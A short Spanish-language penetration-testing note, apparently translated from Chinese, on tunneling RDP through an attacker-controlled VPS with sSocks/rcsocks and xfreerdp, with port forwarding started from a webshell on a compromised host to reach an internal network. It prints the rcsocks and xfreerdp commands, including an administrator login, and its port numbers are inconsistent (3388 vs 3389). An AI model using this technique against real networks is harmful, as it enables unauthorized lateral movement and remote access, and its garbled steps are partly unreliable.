
Proxy SOCKS para el reenvío de puertos y la tunelización RDP, que permite el movimiento lateral y el acceso remoto en escenarios de pruebas de penetración.
Primero, usa sSocks en el VPS para establecer la correspondencia entre los puertos 3388 y 3389, logrando así el flujo de tráfico:
root @ kali:〜#/ root / ssocks-0.0.14 / src / rcsocks -l 3389 -p 3389 -vv
Segundo, desde el lado atacante conéctate al puerto 3388 del VPS. Se recomienda usar freerdp en lugar de rdesktop, porque el primero admite espera de conexiones remotas y locales, copiar y pegar texto y montar sistemas de archivos remotos:
root@kali:~#xfreerdp /u:administrator /p:admin /v:【你的ip】:3389 Tercero, ejecuta inmediatamente el reenvío de puertos en la webshell; puede que tengas que hacer clic en start varias veces seguidas:
Nota: todo el proceso es sensible al orden de los pasos. Una vez que el mapeo de puertos de rcsocks en el VPS esté configurado, ya no tienes que preocuparte por ello. Primero ejecuta xfreerdp en el lado atacante para mantener la sesión activa, y luego reenvía el puerto 3389 de la red interna desde la webshell.